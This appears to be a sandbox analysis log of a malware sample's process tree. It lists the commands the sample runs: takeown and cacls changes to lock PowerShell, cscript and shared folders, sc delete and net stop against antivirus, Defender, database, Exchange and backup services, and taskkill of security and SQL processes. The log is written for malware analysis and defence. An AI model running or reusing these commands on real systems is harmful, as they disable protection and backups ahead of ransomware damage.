C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\ProgramData /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Users\Public /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeHM4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "vmickvpexchange"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "vmicguestinterface"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "vmicshutdown"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "vmicheartbeat"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "vmicrdv"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "storflt"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "vmictimesync"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "vmicvss"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "hvdsvc"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "nvspwmi"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "wmms"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "AvgAdminServer"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "AVG Antivirus"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "avgAdminClient"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SAVService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SAVAdminService"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos AutoUpdate Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Clean Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Device Control Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Endpoint Defense Service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos File Scanner Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Health Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos MCS Agent"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos MCS Client"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SntpService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "swc_service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "swi_service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos UI"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "swi_update"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Web Control Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos System Protection Service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Safestore Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "hmpalertsvc"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "RpcEptMapper"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Endpoint Defense Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SophosFIM"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "swi_filter"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "FirebirdGuardianDefaultInstance"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "FirebirdServerDefaultInstance"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLFDLauncher"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLSERVER"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SQLSERVERAGENT"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLBrowser"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLTELEMETRY"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MsDtsServer130"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SSISTELEMETRY130"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLWriter"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$VEEAMSQL2012"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$VEEAMSQL2012"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLServerADHelper100"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLServerOLAPService"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "MsDtsServer100"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "ReportServer"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLTELEMETRY$HL"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "TMBMServer"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$PROGID"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$WOLTERSKLUWER"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$PROGID"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$WOLTERSKLUWER"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLFDLauncher$OPTIMA"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$OPTIMA"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$OPTIMA"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "ReportServer$OPTIMA"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "msftesql$SQLEXPRESS"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "postgresql-x64-9.4"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "WRSVC"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "ekrn"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "ekrnEpsw"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "klim6"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "AVP18.0.0"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "KLIF"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "klpd"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "klflt"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "klbackupdisk"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "klbackupflt"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "klkbdflt"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "klmouflt"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "klhk"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "KSDE1.0.0"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "kltap"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "ScSecSvc"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Core Mail Protection"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Core Scanning Server"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Core Scanning ServerEx"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Online Protection System"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "RepairService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Core Browsing Protection"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Quick Update Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "McAfeeFramework"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "macmnsvc"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "masvc"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "mfemms"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "mfevtp"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "TmFilter"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "TMLWCSService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "tmusa"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "TmPreFilter"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "TMSmartRelayService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "TMiCRCScanService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "VSApiNt"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "TmCCSF"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "tmlisten"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "TmProxy"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "ntrtscan"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "ofcservice"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "TmPfw"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "PccNTUpd"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "PandaAetherAgent"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "PSUAService"3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QPCore4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "NanoServiceMain"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "EPIntegrationService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "EPProtectedService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "EPRedline"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "EPSecurityService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "EPUpdateService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "UniFi"3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im PccNTMon.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im NTRtScan.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TmListen.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TmCCSF.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TmProxy.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TMBMSRV.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TMBMSRV.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TmPfw.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im CNTAoSMgr.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im sqlbrowser.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im sqlwriter.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im sqlservr.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im msmdsrv.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im MsDtsSrvr.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im sqlceip.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im fdlauncher.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im Ssms.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im SQLAGENT.EXE3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im fdhost.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im fdlauncher.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im sqlservr.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im ReportingServicesService.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im msftesql.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im pg_ctl.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im postgres.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerADHelper1003⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1004⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$ISARS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$ISARS4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$MSFW3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$MSFW4⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$ISARS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$ISARS4⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$MSFW3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$MSFW4⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLBrowser3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser4⤵
-
C:\Windows\SysWOW64\net.exenet stop ReportServer$ISARS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$ISARS4⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLWriter3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Synology Drive VSS Service x64"5⤵
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
C:\Windows\SysWOW64\net.exenet stop mr2kserv3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mr2kserv4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeADTopology3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeADTopology4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeFBA3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeFBA4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeIS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIS4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeSA3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSA4⤵
-
C:\Windows\SysWOW64\net.exenet stop ShadowProtectSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ShadowProtectSvc4⤵
-
C:\Windows\SysWOW64\net.exenet stop SPAdminV43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPAdminV44⤵
-
C:\Windows\SysWOW64\net.exenet stop SPTimerV43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPTimerV44⤵
-
C:\Windows\SysWOW64\net.exenet stop SPTraceV43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPTraceV44⤵
-
C:\Windows\SysWOW64\net.exenet stop SPUserCodeV43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPUserCodeV44⤵
-
C:\Windows\SysWOW64\net.exenet stop SPWriterV43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPWriterV44⤵
-
C:\Windows\SysWOW64\net.exenet stop SPSearch43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPSearch44⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerADHelper1003⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1004⤵
-
C:\Windows\SysWOW64\net.exenet stop IISADMIN3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IISADMIN4⤵
-
C:\Windows\SysWOW64\net.exenet stop firebirdguardiandefaultinstance3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop firebirdguardiandefaultinstance4⤵
-
C:\Windows\SysWOW64\net.exenet stop ibmiasrw3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ibmiasrw4⤵
-
C:\Windows\SysWOW64\net.exenet stop QBCFMonitorService3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService4⤵
-
C:\Windows\SysWOW64\net.exenet stop QBVSS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBVSS4⤵
-
C:\Windows\SysWOW64\net.exenet stop QBPOSDBServiceV123⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBPOSDBServiceV124⤵
-
C:\Windows\SysWOW64\net.exenet stop "IBM Domino Server (CProgramFilesIBMDominodata)"3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "IBM Domino Server (CProgramFilesIBMDominodata)"4⤵
-
C:\Windows\SysWOW64\net.exenet stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"4⤵
-
C:\Windows\SysWOW64\net.exenet stop IISADMIN3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IISADMIN4⤵
-
C:\Windows\SysWOW64\net.exenet stop "Simply Accounting Database Connection Manager"3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Simply Accounting Database Connection Manager"4⤵
-
C:\Windows\SysWOW64\net.exenet stop QuickBooksDB13⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QuickBooksDB14⤵
-
C:\Windows\SysWOW64\net.exenet stop QuickBooksDB23⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QuickBooksDB24⤵
-
C:\Windows\SysWOW64\net.exenet stop QuickBooksDB33⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QuickBooksDB34⤵
-
C:\Windows\SysWOW64\net.exenet stop QuickBooksDB43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QuickBooksDB44⤵
-
C:\Windows\SysWOW64\net.exenet stop QuickBooksDB53⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QuickBooksDB54⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im UniFi.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "imagename eq MsMpEng.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /c "PID"3⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "imagename eq ntrtscan.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /c "PID"3⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "imagename eq avp.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /c "PID"3⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "imagename eq WRSA.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /c "PID"3⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "imagename eq egui.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /c "PID"3⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "imagename eq AvastUI.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /c "PID"3⤵
-
